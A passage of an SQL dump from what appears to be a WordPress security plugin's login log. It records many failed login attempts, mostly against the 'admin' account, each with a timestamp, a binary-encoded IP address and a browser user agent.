Chrome/66.0.3359.117 Safari/537.36'),(5539,9075,1629723256.171824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5540,9078,1629724983.349777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5541,9080,1629725863.551516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5542,9083,1629726235.805944,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5543,9084,1629726628.927241,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5544,9086,1629727245.779187,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����i_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5545,9087,1629727634.798034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(5546,9088,1629728244.154097,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5547,9089,1629729263.553339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5548,9091,1629730286.757927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5549,9093,1629732367.254690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5550,9094,1629732946.202698,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5551,9098,1629738925.092841,1,'loginFailInvalidUsername','1c',0,'\0\0\0\0\0\0\0\0\0\0��$PvT','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5552,9099,1629739466.232171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5553,9100,1629740700.065353,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��W}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5554,9104,1629742381.303695,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5555,9105,1629742678.030954,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%a��','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5556,9109,1629745849.582682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����;I','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(5557,9111,1629747424.995331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5558,9112,1629748968.329230,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5559,9113,1629748972.388722,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5560,9115,1629751927.927198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5561,9118,1629754817.883136,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y�g','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(5562,9119,1629757562.529309,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5563,9125,1629762038.035606,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5564,9130,1629766419.244491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/ɏ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5565,9131,1629767736.120945,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5566,9134,1629770820.401208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5567,9135,1629772292.044327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5568,9140,1629776669.857460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5569,9142,1629778121.002593,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(5570,9143,1629779587.523690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"B�|','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5571,9143,1629779587.557075,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"B�|','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5572,9144,1629781037.943694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(5573,9161,1629782511.957143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5574,9162,1629785275.054734,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�;','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(5575,9163,1629785444.491815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5576,9164,1629785975.041512,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5577,9165,1629786915.884306,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5578,9165,1629786915.919777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5579,9166,1629787931.338534,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5580,9167,1629788380.353906,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5581,9168,1629789857.828036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(5582,9169,1629791323.001799,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����G�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5583,9170,1629791422.022189,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),(5584,9172,1629794016.503687,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(5585,9173,1629794284.418754,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5586,9174,1629795776.687093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5587,9175,1629798186.915206,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5588,9178,1629808383.491669,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5589,9179,1629810305.765006,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0'),(5590,9180,1629814866.931172,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���nUD','Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(5591,9181,1629818471.068245,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5592,9181,1629818471.105141,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5593,9184,1629829718.284635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5594,9185,1629829902.782178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5595,9186,1629830138.709078,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��jK��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5596,9187,1629830338.476309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5597,9188,1629830566.494080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5598,9189,1629830835.699208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5599,9190,1629831071.002123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5600,9191,1629831310.113037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5601,9192,1629831560.304446,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5602,9193,1629831824.896280,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5603,9194,1629832065.530572,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5604,9195,1629832372.766573,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5605,9196,1629832654.041415,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5606,9196,1629832654.082657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5607,9197,1629833207.125765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r�>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5608,9198,1629833450.527370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5609,9199,1629833725.745117,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5610,9200,1629834003.236186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5611,9200,1629834003.269405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5612,9201,1629834313.108977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5613,9202,1629834878.674281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5614,9203,1629835171.049393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5615,9204,1629835447.230847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5616,9205,1629835747.477733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5617,9206,1629836050.855046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���KG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5618,9207,1629836196.435594,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5619,9208,1629836196.660368,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5620,9209,1629836196.867798,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5621,9210,1629836197.107560,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5622,9211,1629836197.337579,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5623,9212,1629836197.555865,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5624,9213,1629836197.828607,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5625,9214,1629836198.036287,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5626,9215,1629836198.282278,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5627,9216,1629836198.494559,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5628,9217,1629836198.721432,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5629,9218,1629836198.941301,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5630,9219,1629836199.172500,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5631,9220,1629836199.384071,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5632,9221,1629836199.624022,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5633,9222,1629836199.847116,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5634,9223,1629836200.096701,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5635,9224,1629836200.376806,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5636,9225,1629836200.658370,1,'loginFailInvalidUsername','diana',0,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5637,9227,1629836360.652288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5638,9229,1629836970.609304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2M_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5639,9231,1629837568.115200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5640,9233,1629838186.616851,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5641,9234,1629838495.267004,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5642,9235,1629838693.241018,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5643,9236,1629838810.195309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5644,9238,1629839420.159570,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5645,9239,1629839770.409773,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5646,9240,1629840057.067810,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h��.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5647,9241,1629840376.185046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5648,9242,1629840725.896851,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5649,9243,1629841048.973244,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5650,9245,1629841690.166071,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5651,9246,1629842019.870425,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5652,9247,1629842357.029090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5653,9248,1629842661.405578,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����vH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5654,9249,1629843029.467925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5655,9250,1629843337.607740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5656,9251,1629843708.151873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5657,9252,1629844054.530889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5658,9253,1629844403.062633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 